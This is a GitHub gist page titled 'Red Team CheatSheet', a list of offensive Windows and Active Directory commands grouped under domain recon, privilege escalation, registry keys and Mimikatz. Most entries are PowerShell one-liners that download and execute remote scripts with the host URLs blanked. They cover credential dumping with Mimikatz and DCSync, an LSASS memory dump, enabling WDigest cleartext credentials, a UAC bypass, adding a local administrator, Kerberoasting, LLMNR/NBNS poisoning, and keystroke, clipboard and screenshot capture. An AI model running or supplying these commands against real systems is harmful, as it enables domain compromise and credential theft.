Skip to content

Instantly share code, notes, and snippets.

Forked from m8sec/RedTeam_CheatSheet.ps1
Created December 7, 2021 08:17
Show Gist options
  • Save mehmethafif/03305b668be52ecaff270bac1700662f to your computer and use it in GitHub Desktop.
Save mehmethafif/03305b668be52ecaff270bac1700662f to your computer and use it in GitHub Desktop.
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('');Invoke-BloodHound"
## ADRecon script to generate XLSX file of domain properties
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
# Priv Esc
## PowerUp script
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Invoke-AllChecks”
## cPasswords in sysvol
findstr /S cpassword %logonserver%\sysvol\*.xml
findstr /S cpassword $env:logonserver\sysvol\*.xml
## Inveigh
### Start inveigh using Basic Auth - logging to file
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y -HTTPAuth Basic"
### Start inveigh in silent mode (no popups)
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y -WPADAuth anonymous"
## Invoke-HotPotato Exploit
powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');invoke-Tater -Command 'net localgroup Administrators user /add'"
## Bypass UAC and launch PowerShell window as admin
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-BypassUAC -Command 'start powershell.exe'"
## Invoke-Kerberoast with Hashcat Output
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-kerberoast -OutputFormat Hashcat"
# Reg Keys
## Enable Wdigest
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1 /f
## Check always install elevated
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
# Mimikatz
## Invoke Mimikatz
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds"
## Import Mimikatz Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
## Perform DcSync attack
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:demodomain /user:sqladmin"'
## Invoke-MassMimikatz
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
## Manual Procdump for offline mimikatz
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Useful Scripts/Commands
## Use Windows Debug api to pause live processes
powershell.exe -nop -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Pause-Process -ID 1180;UnPause-Process -ID 1180;"
## Import Powersploits invoke-keystrokes
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
## Import Empire's Get-ClipboardContents
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
## Import Get-TimedScreenshot
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
# Useful Links
## Nmap
## EyeWitness Binary
## Sys InternalTools
## List of Binaries that can be used for living off the land techniques
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment